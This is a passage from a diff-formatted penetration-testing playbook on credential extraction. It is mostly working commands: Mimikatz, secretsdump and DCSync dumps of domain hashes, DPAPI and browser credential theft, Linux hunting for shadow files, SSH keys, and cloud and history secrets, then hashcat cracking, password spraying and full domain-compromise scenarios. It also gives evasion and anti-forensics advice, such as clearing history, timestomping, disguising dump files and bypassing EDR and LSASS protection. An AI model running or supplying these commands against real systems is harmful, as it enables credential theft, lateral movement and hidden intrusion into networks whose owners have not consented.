copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Windows\Temp\SYSTEM_vss
|
|
252
|
+
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\ntds\ntds.dit C:\Windows\Temp\ntds.dit
|
|
253
|
+
```
|
|
254
|
+
|
|
255
|
+
#### 2E. Remote Dump with secretsdump.py (No File on Target)
|
|
256
|
+
|
|
257
|
+
```bash
|
|
258
|
+
# Dump SAM + LSA secrets remotely using admin credentials
|
|
259
|
+
impacket-secretsdump DOMAIN/Administrator:Password@TARGET_IP
|
|
260
|
+
|
|
261
|
+
# With NTLM hash (pass-the-hash)
|
|
262
|
+
impacket-secretsdump -hashes :NTLM_HASH DOMAIN/Administrator@TARGET_IP
|
|
263
|
+
|
|
264
|
+
# Against domain controller (dumps all domain hashes via VSS)
|
|
265
|
+
impacket-secretsdump DOMAIN/DomainAdmin:Password@DC_IP -just-dc
|
|
266
|
+
|
|
267
|
+
# DCSync (no VSS, uses replication protocol — much stealthier on DC)
|
|
268
|
+
impacket-secretsdump DOMAIN/DomainAdmin:Password@DC_IP -just-dc-user Administrator
|
|
269
|
+
impacket-secretsdump DOMAIN/DomainAdmin:Password@DC_IP -just-dc-ntlm
|
|
270
|
+
|
|
271
|
+
# Parse NTDS.dit offline after transfer
|
|
272
|
+
impacket-secretsdump -ntds /tmp/ntds.dit -system /tmp/SYSTEM LOCAL
|
|
273
|
+
```
|
|
274
|
+
|
|
275
|
+
#### 2F. DCSync via Mimikatz (Stealthiest DC Attack)
|
|
276
|
+
|
|
277
|
+
```powershell
|
|
278
|
+
# On a machine with DA or replication rights:
|
|
279
|
+
mimikatz.exe "lsadump::dcsync /domain:CORP.LOCAL /user:Administrator" "exit"
|
|
280
|
+
|
|
281
|
+
# Dump all domain hashes (noisy — only do in authorized engagements with explicit scope):
|
|
282
|
+
mimikatz.exe "lsadump::dcsync /domain:CORP.LOCAL /all /csv" "exit"
|
|
283
|
+
```
|
|
284
|
+
|
|
285
|
+
#### 2G. DPAPI — Saved Credentials Decryption
|
|
286
|
+
|
|
287
|
+
```powershell
|
|
288
|
+
# List DPAPI credential blobs for current user
|
|
289
|
+
dir "%APPDATA%\Microsoft\Credentials\"
|
|
290
|
+
dir "%LOCALAPPDATA%\Microsoft\Credentials\"
|
|
291
|
+
|
|
292
|
+
# Dump master keys (requires Mimikatz as current user or SYSTEM):
|
|
293
|
+
mimikatz.exe "dpapi::cred /in:%APPDATA%\Microsoft\Credentials\<BLOB_FILE>" "exit"
|
|
294
|
+
|
|
295
|
+
# If SYSTEM: decrypt domain backup key to decrypt any user's masterkey
|
|
296
|
+
mimikatz.exe "privilege::debug" "sekurlsa::dpapi" "exit"
|
|
297
|
+
|
|
298
|
+
# Decrypt specific blob with masterkey GUID:
|
|
299
|
+
mimikatz.exe "dpapi::masterkey /in:%APPDATA%\Microsoft\Protect\<SID>\<GUID> /rpc" "dpapi::cred /in:%APPDATA%\Microsoft\Credentials\<BLOB>" "exit"
|
|
300
|
+
```
|
|
301
|
+
|
|
302
|
+
#### 2H. Browser Credentials with LaZagne
|
|
303
|
+
|
|
304
|
+
```cmd
|
|
305
|
+
# Transfer lazagne.exe to target and run
|
|
306
|
+
lazagne.exe browsers
|
|
307
|
+
lazagne.exe all # All supported modules
|
|
308
|
+
lazagne.exe all -oJ # JSON output
|
|
309
|
+
lazagne.exe all -oA -output C:\Windows\Temp\creds
|
|
310
|
+
```
|
|
311
|
+
|
|
312
|
+
```bash
|
|
313
|
+
# On Linux (run as current user):
|
|
314
|
+
python3 /opt/lazagne/laZagne.py all
|
|
315
|
+
python3 /opt/lazagne/laZagne.py browsers
|
|
316
|
+
python3 /opt/lazagne/laZagne.py all -oJ -output /tmp/
|
|
317
|
+
```
|
|
318
|
+
|
|
319
|
+
#### 2I. Windows Credential Manager
|
|
320
|
+
|
|
321
|
+
```cmd
|
|
322
|
+
# List stored credentials
|
|
323
|
+
cmdkey /list
|
|
324
|
+
|
|
325
|
+
# Dump via Mimikatz (requires admin):
|
|
326
|
+
mimikatz.exe "privilege::debug" "sekurlsa::credman" "exit"
|
|
327
|
+
|
|
328
|
+
# PowerShell enumeration:
|
|
329
|
+
[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
|
|
330
|
+
$vault = New-Object Windows.Security.Credentials.PasswordVault
|
|
331
|
+
$vault.RetrieveAll() | ForEach-Object { $_.RetrievePassword(); $_ }
|
|
332
|
+
```
|
|
333
|
+
|
|
334
|
+
### Phase 3 — Linux Credential Extraction
|
|
335
|
+
|
|
336
|
+
#### 3A. /etc/shadow Extraction
|
|
337
|
+
|
|
338
|
+
```bash
|
|
339
|
+
# Read shadow file (requires root)
|
|
340
|
+
cat /etc/shadow
|
|
341
|
+
|
|
342
|
+
# Combine with /etc/passwd for cracking
|
|
343
|
+
unshadow /etc/passwd /etc/shadow > /tmp/unshadowed.txt
|
|
344
|
+
|
|
345
|
+
# Also check:
|
|
346
|
+
cat /etc/passwd # Check for old-style password field (not 'x')
|
|
347
|
+
cat /etc/master.passwd # BSD systems
|
|
348
|
+
```
|
|
349
|
+
|
|
350
|
+
#### 3B. SSH Private Key Hunting
|
|
351
|
+
|
|
352
|
+
```bash
|
|
353
|
+
# Find SSH private keys across the system
|
|
354
|
+
find / -name "id_rsa" -o -name "id_ed25519" -o -name "id_ecdsa" -o -name "*.pem" 2>/dev/null
|
|
355
|
+
find / -name "authorized_keys" 2>/dev/null # Find where keys are accepted
|
|
356
|
+
|
|
357
|
+
# Check home directories
|
|
358
|
+
for dir in /home/*; do ls -la $dir/.ssh/ 2>/dev/null; done
|
|
359
|
+
ls -la /root/.ssh/
|
|
360
|
+
|
|
361
|
+
# Check for passphrase-protected keys (try empty passphrase first)
|
|
362
|
+
ssh-keygen -y -f /path/to/key # Prompts if passphrase required
|
|
363
|
+
|
|
364
|
+
# If protected, crack with John:
|
|
365
|
+
python3 /usr/share/john/ssh2john.py /path/to/id_rsa > /tmp/ssh_hash.txt
|
|
366
|
+
john /tmp/ssh_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
|
|
367
|
+
```
|
|
368
|
+
|
|
369
|
+
#### 3C. Bash History and Config File Mining
|
|
370
|
+
|
|
371
|
+
```bash
|
|
372
|
+
# Current and other user histories
|
|
373
|
+
cat ~/.bash_history
|
|
374
|
+
cat ~/.zsh_history
|
|
375
|
+
cat ~/.fish_history
|
|
376
|
+
for user in $(cat /etc/passwd | cut -d: -f1,6 | grep -v nologin | grep -v false | cut -d: -f2); do
|
|
377
|
+
echo "=== $user ===" && cat $user/.bash_history 2>/dev/null
|
|
378
|
+
done
|
|
379
|
+
|
|
380
|
+
# Grep for credentials in histories
|
|
381
|
+
grep -iE "(pass|pwd|secret|key|token|api|bearer|auth|curl.*-u|mysql.*-p|psql.*-W)" ~/.bash_history
|
|
382
|
+
|
|
383
|
+
# Application configuration files
|
|
384
|
+
find / -name "*.conf" -o -name "*.cfg" -o -name "*.ini" -o -name "*.env" -o -name "*.yaml" -o -name "*.yml" 2>/dev/null | xargs grep -l -iE "(password|passwd|secret|api_key|token)" 2>/dev/null
|
|
385
|
+
|
|
386
|
+
# Web app configs
|
|
387
|
+
find /var/www /srv /opt /home -name "wp-config.php" -o -name "config.php" -o -name "database.yml" -o -name ".env" 2>/dev/null
|
|
388
|
+
cat /var/www/html/wp-config.php 2>/dev/null | grep -iE "DB_PASS|DB_USER"
|
|
389
|
+
|
|
390
|
+
# Database credential files
|
|
391
|
+
cat ~/.my.cnf 2>/dev/null
|
|
392
|
+
cat ~/.pgpass 2>/dev/null
|
|
393
|
+
cat /etc/mysql/debian.cnf 2>/dev/null
|
|
394
|
+
|
|
395
|
+
# Cloud credential files
|
|
396
|
+
cat ~/.aws/credentials 2>/dev/null
|
|
397
|
+
cat ~/.aws/config 2>/dev/null
|
|
398
|
+
cat ~/.config/gcloud/application_default_credentials.json 2>/dev/null
|
|
399
|
+
cat ~/.azure/accessTokens.json 2>/dev/null
|
|
400
|
+
|
|
401
|
+
# Docker and Kubernetes
|
|
402
|
+
cat ~/.docker/config.json 2>/dev/null
|
|
403
|
+
cat ~/.kube/config 2>/dev/null
|
|
404
|
+
|
|
405
|
+
# SSH config (reveals hostnames, users, key paths for lateral movement)
|
|
406
|
+
cat ~/.ssh/config 2>/dev/null
|
|
407
|
+
cat /etc/ssh/ssh_config 2>/dev/null
|
|
408
|
+
```
|
|
409
|
+
|
|
410
|
+
#### 3D. Running Process and Memory Mining
|
|
411
|
+
|
|
412
|
+
```bash
|
|
413
|
+
# Check running processes for credentials in command-line args
|
|
414
|
+
ps auxww | grep -iE "(pass|pwd|secret|token|key)"
|
|
415
|
+
|
|
416
|
+
# Check /proc for sensitive environment variables of running processes
|
|
417
|
+
for pid in $(ls /proc | grep -E '^[0-9]+$'); do
|
|
418
|
+
cat /proc/$pid/environ 2>/dev/null | tr '\0' '\n' | grep -iE "(pass|pwd|secret|key|token|api)"
|
|
419
|
+
done
|
|
420
|
+
|
|
421
|
+
# Check process memory strings (requires root or same user as process)
|
|
422
|
+
strings /proc/<PID>/mem 2>/dev/null | grep -iE "(password|passwd|secret)"
|
|
423
|
+
```
|
|
424
|
+
|
|
425
|
+
### Phase 4 — Hash Cracking with Hashcat
|
|
426
|
+
|
|
427
|
+
```bash
|
|
428
|
+
# Identify hash type before cracking
|
|
429
|
+
hashcat --identify /tmp/hashes.txt
|
|
430
|
+
|
|
431
|
+
# NTLM hashes (Windows) — hashcat mode 1000
|
|
432
|
+
hashcat -m 1000 /tmp/ntlm_hashes.txt /usr/share/wordlists/rockyou.txt
|
|
433
|
+
hashcat -m 1000 /tmp/ntlm_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
|
|
434
|
+
|
|
435
|
+
# NTLMv2 (Net-NTLMv2 from Responder captures) — mode 5600
|
|
436
|
+
hashcat -m 5600 /tmp/netntlmv2.txt /usr/share/wordlists/rockyou.txt
|
|
437
|
+
|
|
438
|
+
# MD5 — mode 0
|
|
439
|
+
hashcat -m 0 /tmp/md5_hashes.txt /usr/share/wordlists/rockyou.txt
|
|
440
|
+
|
|
441
|
+
# SHA-256 — mode 1400
|
|
442
|
+
hashcat -m 1400 /tmp/sha256.txt /usr/share/wordlists/rockyou.txt
|
|
443
|
+
|
|
444
|
+
# bcrypt — mode 3200 (slow)
|
|
445
|
+
hashcat -m 3200 /tmp/bcrypt.txt /usr/share/wordlists/rockyou.txt
|
|
446
|
+
|
|
447
|
+
# SHA-512 crypt (Linux /etc/shadow $6$) — mode 1800
|
|
448
|
+
hashcat -m 1800 /tmp/shadow_hashes.txt /usr/share/wordlists/rockyou.txt
|
|
449
|
+
|
|
450
|
+
# DCC2 (domain cached credentials $DCC2$) — mode 2100
|
|
451
|
+
hashcat -m 2100 /tmp/dcc2_hashes.txt /usr/share/wordlists/rockyou.txt
|
|
452
|
+
|
|
453
|
+
# Kerberos TGS (AS-REP, Kerberoasting) — mode 18200 / 13100
|
|
454
|
+
hashcat -m 18200 /tmp/asrep_hashes.txt /usr/share/wordlists/rockyou.txt # AS-REP roasting
|
|
455
|
+
hashcat -m 13100 /tmp/tgs_hashes.txt /usr/share/wordlists/rockyou.txt # Kerberoasting
|
|
456
|
+
|
|
457
|
+
# Use mask attack for password patterns (e.g., Company2024!)
|
|
458
|
+
hashcat -m 1000 /tmp/ntlm.txt -a 3 "Company?d?d?d?d!"
|
|
459
|
+
|
|
460
|
+
# Combination attack — combine two wordlists
|
|
461
|
+
hashcat -m 1000 /tmp/ntlm.txt -a 1 /tmp/words1.txt /tmp/words2.txt
|
|
462
|
+
|
|
463
|
+
# Show cracked passwords
|
|
464
|
+
hashcat -m 1000 /tmp/ntlm.txt --show
|
|
465
|
+
|
|
466
|
+
# John the Ripper alternative
|
|
467
|
+
john /tmp/unshadowed.txt --wordlist=/usr/share/wordlists/rockyou.txt
|
|
468
|
+
john /tmp/unshadowed.txt --show
|
|
469
|
+
```
|
|
470
|
+
|
|
471
|
+
### Phase 5 — Credential Validation and Spraying
|
|
472
|
+
|
|
473
|
+
```bash
|
|
474
|
+
# Validate a single credential against SMB
|
|
475
|
+
nxc smb TARGET_IP -u Administrator -p 'Password123!'
|
|
476
|
+
nxc smb TARGET_IP -u Administrator -H NTLM_HASH # Pass-the-hash
|
|
477
|
+
|
|
478
|
+
# Spray a credential across a subnet
|
|
479
|
+
nxc smb 192.168.1.0/24 -u Administrator -p 'Password123!'
|
|
480
|
+
|
|
481
|
+
# Spray against a list of users
|
|
482
|
+
nxc smb TARGET_IP -u /tmp/users.txt -p 'Winter2024!' --continue-on-success
|
|
483
|
+
|
|
484
|
+
# WinRM validation
|
|
485
|
+
nxc winrm TARGET_IP -u Administrator -p 'Password123!'
|
|
486
|
+
|
|
487
|
+
# SSH validation
|
|
488
|
+
nxc ssh TARGET_IP -u root -p 'Password123!'
|
|
489
|
+
ssh -i /tmp/stolen_id_rsa user@TARGET_IP
|
|
490
|
+
|
|
491
|
+
# Validate domain credentials
|
|
492
|
+
nxc smb DC_IP -u DomainUser -p 'Password123!' -d CORP.LOCAL
|
|
493
|
+
```
|
|
494
|
+
|
|
495
|
+
---
|
|
496
|
+
|
|
497
|
+
## Real Attack Scenarios
|
|
498
|
+
|
|
499
|
+
### Scenario 1 — Windows Internal Network: Local Admin to Domain Admin
|
|
500
|
+
|
|
501
|
+
**Context:** You have a Meterpreter shell on a Windows 10 workstation as a local admin. Goal: extract domain admin credentials.
|
|
502
|
+
|
|
503
|
+
```bash
|
|
504
|
+
# Step 1: From Meterpreter, migrate to a SYSTEM process or use getsystem
|
|
505
|
+
# In Meterpreter:
|
|
506
|
+
getsystem
|
|
507
|
+
getuid # Should show NT AUTHORITY\SYSTEM
|
|
508
|
+
|
|
509
|
+
# Step 2: Dump LSASS with Mimikatz Meterpreter module
|
|
510
|
+
load kiwi
|
|
511
|
+
creds_all
|
|
512
|
+
lsa_dump_sam
|
|
513
|
+
|
|
514
|
+
# Step 3: Look for domain user credentials in output
|
|
515
|
+
# If domain user credentials are found (plaintext or NTLM hash):
|
|
516
|
+
# Note: CORP\jsmith : NTLMhash_value
|
|
517
|
+
|
|
518
|
+
# Step 4: Validate the hash against the DC
|
|
519
|
+
nxc smb DC_IP -u jsmith -H NTLM_HASH -d CORP.LOCAL
|
|
520
|
+
|
|
521
|
+
# Step 5: If jsmith has DA rights, run DCSync to dump all hashes
|
|
522
|
+
impacket-secretsdump -hashes :NTLM_HASH CORP.LOCAL/jsmith@DC_IP -just-dc-ntlm
|
|
523
|
+
|
|
524
|
+
# Step 6: Crack the krbtgt hash for Golden Ticket (if in scope)
|
|
525
|
+
hashcat -m 1000 /tmp/dc_hashes.txt /usr/share/wordlists/rockyou.txt
|
|
526
|
+
|
|
527
|
+
# Step 7: Document all found credentials with context
|
|
528
|
+
```
|
|
529
|
+
|
|
530
|
+
---
|
|
531
|
+
|
|
532
|
+
### Scenario 2 — Linux Web Server Compromise: App Creds to Root
|
|
533
|
+
|
|
534
|
+
**Context:** You have a low-privilege shell on a Linux web server (www-data). Goal: escalate to root and extract all credentials.
|
|
535
|
+
|
|
536
|
+
```bash
|
|
537
|
+
# Step 1: Mine application config files for database passwords
|
|
538
|
+
find /var/www -name "*.php" -o -name "*.env" -o -name "*.conf" 2>/dev/null | \
|
|
539
|
+
xargs grep -l -iE "(password|DB_PASS|secret)" 2>/dev/null
|
|
540
|
+
|
|
541
|
+
cat /var/www/html/app/.env
|
|
542
|
+
# Found: DB_PASSWORD=SuperSecret123
|
|
543
|
+
|
|
544
|
+
# Step 2: Connect to database and extract password hashes
|
|
545
|
+
mysql -u webapp_user -p'SuperSecret123' -e "SELECT user, authentication_string FROM mysql.user;" 2>/dev/null
|
|
546
|
+
|
|
547
|
+
# Step 3: Check bash history of www-data and other users
|
|
548
|
+
cat ~/.bash_history | grep -iE "(pass|sudo|su |ssh)"
|
|
549
|
+
|
|
550
|
+
# Step 4: Hunt for SSH keys
|
|
551
|
+
find /home /var/www /root -name "id_rsa" -o -name "id_ed25519" 2>/dev/null
|
|
552
|
+
# Found: /home/deploy/.ssh/id_rsa
|
|
553
|
+
|
|
554
|
+
# Step 5: Use the deploy key to SSH to other systems
|
|
555
|
+
ssh -i /home/deploy/.ssh/id_rsa deploy@192.168.10.50
|
|
556
|
+
|
|
557
|
+
# Step 6: If root is obtained (via sudo/kernel exploit), extract /etc/shadow
|
|
558
|
+
sudo cat /etc/shadow > /tmp/shadow.txt
|
|
559
|
+
unshadow /etc/passwd /etc/shadow > /tmp/unshadowed.txt
|
|
560
|
+
|
|
561
|
+
# Step 7: Transfer to Kali and crack
|
|
562
|
+
scp attacker@KALI_IP:/tmp/unshadowed.txt .
|
|
563
|
+
hashcat -m 1800 /tmp/unshadowed.txt /usr/share/wordlists/rockyou.txt
|
|
564
|
+
```
|
|
565
|
+
|
|
566
|
+
---
|
|
567
|
+
|
|
568
|
+
### Scenario 3 — Remote Domain Controller: Secretsdump + Full Domain Compromise
|
|
569
|
+
|
|
570
|
+
**Context:** You have obtained Domain Admin credentials through phishing + privilege escalation. Goal: dump entire Active Directory for documentation.
|
|
571
|
+
|
|
572
|
+
```bash
|
|
573
|
+
# Step 1: Validate DA credentials
|
|
574
|
+
nxc smb DC_IP -u 'DomainAdmin' -p 'Passw0rd!' -d CORP.LOCAL --shares
|
|
575
|
+
|
|
576
|
+
# Step 2: Remote secretsdump against DC (VSS method — dumps NTDS.dit remotely)
|
|
577
|
+
impacket-secretsdump 'CORP.LOCAL/DomainAdmin:Passw0rd!@DC_IP' -just-dc -outputfile /tmp/corp_domain_dump
|
|
578
|
+
|
|
579
|
+
# Step 3: Review output files
|
|
580
|
+
cat /tmp/corp_domain_dump.ntds | head -50
|
|
581
|
+
# Format: domain\user:RID:LM_HASH:NTLM_HASH:::
|
|
582
|
+
|
|
583
|
+
# Step 4: Extract just NTLM hashes for cracking
|
|
584
|
+
cut -d: -f4 /tmp/corp_domain_dump.ntds > /tmp/ntlm_only.txt
|
|
585
|
+
|
|
586
|
+
# Step 5: Crack with hashcat — prioritize high-value accounts
|
|
587
|
+
# First check if Administrator hash is already known:
|
|
588
|
+
grep "Administrator" /tmp/corp_domain_dump.ntds
|
|
589
|
+
|
|
590
|
+
# Run cracking job:
|
|
591
|
+
hashcat -m 1000 /tmp/ntlm_only.txt /usr/share/wordlists/rockyou.txt \
|
|
592
|
+
-r /usr/share/hashcat/rules/best64.rule \
|
|
593
|
+
-r /usr/share/hashcat/rules/d3ad0ne.rule \
|
|
594
|
+
-o /tmp/cracked.txt
|
|
595
|
+
|
|
596
|
+
# Step 6: Map cracked passwords back to usernames
|
|
597
|
+
hashcat -m 1000 /tmp/ntlm_only.txt --show --username
|
|
598
|
+
|
|
599
|
+
# Step 7: Check for password reuse across accounts
|
|
600
|
+
# Extract cracked passwords
|
|
601
|
+
cut -d: -f2 /tmp/cracked.txt | sort -u > /tmp/passwords.txt
|
|
602
|
+
|
|
603
|
+
# Spray cracked passwords against other services
|
|
604
|
+
nxc smb 192.168.1.0/24 -u /tmp/users.txt -p /tmp/passwords.txt --continue-on-success
|
|
605
|
+
|
|
606
|
+
# Step 8: Check for krbtgt hash (enables Golden Ticket)
|
|
607
|
+
grep "krbtgt" /tmp/corp_domain_dump.ntds
|
|
608
|
+
|
|
609
|
+
# Step 9: Dump browser credentials on DA workstation (lateral move)
|
|
610
|
+
nxc smb DA_WORKSTATION_IP -u 'DomainAdmin' -p 'Passw0rd!' -d CORP.LOCAL \
|
|
611
|
+
--exec-method smbexec \
|
|
612
|
+
-x "lazagne.exe all -oJ"
|
|
613
|
+
```
|
|
614
|
+
|
|
615
|
+
---
|
|
616
|
+
|
|
617
|
+
## OPSEC Considerations
|
|
618
|
+
|
|
619
|
+
### Detection Risks
|
|
620
|
+
|
|
621
|
+
| Technique | Detection Risk | Triggered By |
|
|
622
|
+
|---|---|---|
|
|
623
|
+
| sekurlsa::logonpasswords | CRITICAL | LSASS access, Mimikatz signatures, Event ID 10 (Sysmon) |
|
|
624
|
+
| comsvcs.dll MiniDump | HIGH | rundll32 + comsvcs.dll + lsass.exe in process tree |
|
|
625
|
+
| secretsdump.py remote | HIGH | SMB pipe SVCCTL, remote service creation, Event ID 7045 |
|
|
626
|
+
| DCSync | MEDIUM-HIGH | Replication RPCs from non-DC machine, Event ID 4662 |
|
|
627
|
+
| VSS shadow copy creation | MEDIUM | Event ID 8222 (VSS), unusual wmic.exe activity |
|
|
628
|
+
| SAM/SYSTEM reg export | MEDIUM | reg.exe saving HKLM\SAM, Event ID 4663 |
|
|
629
|
+
| LaZagne | HIGH | Process creation from temp dirs, network requests, Defender signatures |
|
|
630
|
+
| /etc/shadow read | MEDIUM | auditd file access logs (if configured) |
|
|
631
|
+
| SSH key access | LOW-MEDIUM | File access logs if auditd active |
|
|
632
|
+
|
|
633
|
+
### Mitigation Strategies for Operators (Reduce Footprint)
|
|
634
|
+
|
|
635
|
+
```bash
|
|
636
|
+
# 1. Use C2-integrated credential dumping (e.g., Cobalt Strike kiwi, Havoc, Sliver)
|
|
637
|
+
# — avoids dropping files to disk
|
|
638
|
+
|
|
639
|
+
# 2. For LSASS, prefer API-based dumps over mimikatz.exe on disk
|
|
640
|
+
# — Use SharpDump, Nanodump, or custom loader
|
|
641
|
+
|
|
642
|
+
# 3. Rename output files to benign names
|
|
643
|
+
# — lsass.dmp → werfault.dmp, creds.txt → update.log
|
|
644
|
+
|
|
645
|
+
# 4. Delete artifacts immediately after transfer
|
|
646
|
+
del C:\Windows\Temp\SAM C:\Windows\Temp\SYSTEM C:\Windows\Temp\lsass.dmp
|
|
647
|
+
|
|
648
|
+
# 5. Prefer DCSync over LSASS dump on domain controllers
|
|
649
|
+
# — DCSync touches no files on the DC, lower EDR signature
|
|
650
|
+
|
|
651
|
+
# 6. Avoid running LaZagne or Mimikatz from common temp paths
|
|
652
|
+
# — Use %APPDATA%, user writable paths, or in-memory execution
|
|
653
|
+
|
|
654
|
+
# 7. Hash cracking always done on operator machine (offline)
|
|
655
|
+
# — Never crack on the target
|
|
656
|
+
|
|
657
|
+
# 8. Validate credentials slowly — avoid lockout thresholds
|
|
658
|
+
# — Default AD lockout: 5 failed attempts
|
|
659
|
+
# — Space attempts: 1 per hour minimum for spraying
|
|
660
|
+
|
|
661
|
+
# 9. Clear bash history on Linux after mining
|
|
662
|
+
history -c && history -w
|
|
663
|
+
|
|
664
|
+
# 10. Use timestomping if file artifacts are unavoidable (Windows)
|
|
665
|
+
# Mimikatz: timestomp C:\Windows\Temp\m.exe -m "01/01/2023 00:00:00"
|
|
666
|
+
```
|
|
667
|
+
|
|
668
|
+
### EDR/AV Evasion Notes
|
|
669
|
+
|
|
670
|
+
- Mimikatz is heavily signatured. Use obfuscated builds, in-memory loading (Invoke-Mimikatz, SharpKatz), or C2 kiwi modules
|
|
671
|
+
- comsvcs.dll MiniDump is now flagged by most modern EDRs — consider API-based alternatives (MalSecLogon, NanoDump)
|
|
672
|
+
- secretsdump.py generates distinct SMB traffic patterns — use with caution against monitored environments
|
|
673
|
+
- Windows Defender blocks most credential dumping by default on modern Windows — check PPL (Protected Process Light) status of LSASS
|
|
674
|
+
- Check if LSASS is PPL-protected before attempting memory dump:
|
|
675
|
+
|
|
676
|
+
```powershell
|
|
677
|
+
Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "RunAsPPL"
|
|
678
|
+
# If RunAsPPL = 1, standard LSASS dump will fail — need PPL bypass (mimidrv.sys, PPLdump)
|
|
679
|
+
```
|
|
680
|
+
|
|
681
|
+
---
|
|
682
|
+
|
|
683
|
+
## Output and Documentation Instructions
|
|
684
|
+
|
|
685
|
+
### During Engagement — Capture Everything
|
|
686
|
+
|
|
687
|
+
```bash
|
|
688
|
+
# Create organized output directory per target
|
|
689
|
+
mkdir -p /tmp/engagement/TARGET_IP/{credentials,hashes,screenshots,notes}
|
|
690
|
+
|
|
691
|
+
# Redirect all tool output
|
|
692
|
+
impacket-secretsdump ... 2>&1 | tee /tmp/engagement/TARGET_IP/credentials/secretsdump_$(date +%Y%m%d_%H%M%S).txt
|
|
693
|
+
|
|
694
|
+
# Screenshot terminal evidence (tmux logging or script)
|
|
695
|
+
script -a /tmp/engagement/TARGET_IP/notes/session_log.txt
|
|
696
|
+
# All subsequent commands logged until: exit
|
|
697
|
+
```
|
|
698
|
+
|
|
699
|
+
### Documentation Format for Report
|
|
700
|
+
|
|
701
|
+
For each credential found, document:
|
|
702
|
+
|
|
703
|
+
```
|
|
704
|
+
Host: TARGET_IP / HOSTNAME
|
|
705
|
+
Account: DOMAIN\username (or local)
|
|
706
|
+
Type: Cleartext | NTLM Hash | NTLMv2 Hash | Kerberos Hash | SSH Key | API Key
|
|
707
|
+
Value: [password or hash — redact in client-facing report if required]
|
|
708
|
+
Source: LSASS / SAM / /etc/shadow / Browser / Config File / History
|
|
709
|
+
Access Level: Local Admin | Domain User | Domain Admin | Service Account
|
|
710
|
+
Cracked: Yes/No — Cracked Password: [value]
|
|
711
|
+
Used For: Lateral movement to HOST2 / Validated only / Demonstrated reuse
|
|
712
|
+
Evidence File: /path/to/screenshot_or_log
|
|
713
|
+
```
|
|
714
|
+
|
|
715
|
+
### Redaction for Client Reports
|
|
716
|
+
|
|
717
|
+
- Always hash or truncate actual passwords in executive summaries
|
|
718
|
+
- Include full credentials in technical appendix, marked CONFIDENTIAL
|
|
719
|
+
- Document password complexity/pattern to highlight policy failures without exposing exact values (e.g., "Password followed pattern: CompanyName + Year + Symbol")
|
|
720
|
+
|
|
721
|
+
---
|
|
722
|
+
|
|
723
|
+
## Resources
|
|
724
|
+
|
|
725
|
+
### Primary Tools
|
|
726
|
+
|
|
727
|
+
- Mimikatz: https://github.com/gentilkiwi/mimikatz
|
|
728
|
+
- Impacket (secretsdump, etc.): https://github.com/fortra/impacket
|
|
729
|
+
- LaZagne: https://github.com/AlessandroZ/LaZagne
|
|
730
|
+
- pypykatz: https://github.com/skelsec/pypykatz
|
|
731
|
+
- NetExec (CME successor): https://github.com/Pennyw0rth/NetExec
|
|
732
|
+
- CrackMapExec: https://github.com/byt3bl33d3r/CrackMapExec
|
|
733
|
+
- Hashcat: https://github.com/hashcat/hashcat
|
|
734
|
+
|
|
735
|
+
### Evasion and Advanced Techniques
|
|
736
|
+
|
|
737
|
+
- NanoDump (stealthy LSASS dump): https://github.com/helpsystems/nanodump
|
|
738
|
+
- SharpDump: https://github.com/GhostPack/SharpDump
|
|
739
|
+
- Rubeus (Kerberos attacks): https://github.com/GhostPack/Rubeus
|
|
740
|
+
- SharpDPAPI (DPAPI attacks): https://github.com/GhostPack/SharpDPAPI
|
|
741
|
+
- PPLdump (bypass PPL protected LSASS): https://github.com/itm4n/PPLdump
|
|
742
|
+
|
|
743
|
+
### Reference Material
|
|
744
|
+
|
|
745
|
+
- MITRE ATT&CK TA0006 (Credential Access): https://attack.mitre.org/tactics/TA0006/
|
|
746
|
+
- MITRE T1003 (OS Credential Dumping): https://attack.mitre.org/techniques/T1003/
|
|
747
|
+
- Hashcat example hashes: https://hashcat.net/wiki/doku.php?id=example_hashes
|
|
748
|
+
- Hashcat rules collection: https://github.com/NotSoSecure/password_cracking_rules
|
|
749
|
+
- ired.team credential access notes: https://www.ired.team/offensive-security/credential-access-and-credential-dumping
|
|
750
|
+
- S3cur3Th1sSh1t credential dumping cheatsheet: https://github.com/S3cur3Th1sSh1t/Cheatsheet-God
|
|
751
|
+
|
|
752
|
+
### Wordlists and Rules
|
|
753
|
+
|
|
754
|
+
- SecLists passwords: https://github.com/danielmiessler/SecLists/tree/master/Passwords
|
|
755
|
+
- Probable-Wordlists: https://github.com/berzerk0/Probable-Wordlists
|
|
756
|
+
- OneRuleToRuleThemAll: https://github.com/NotSoSecure/password_cracking_rules
|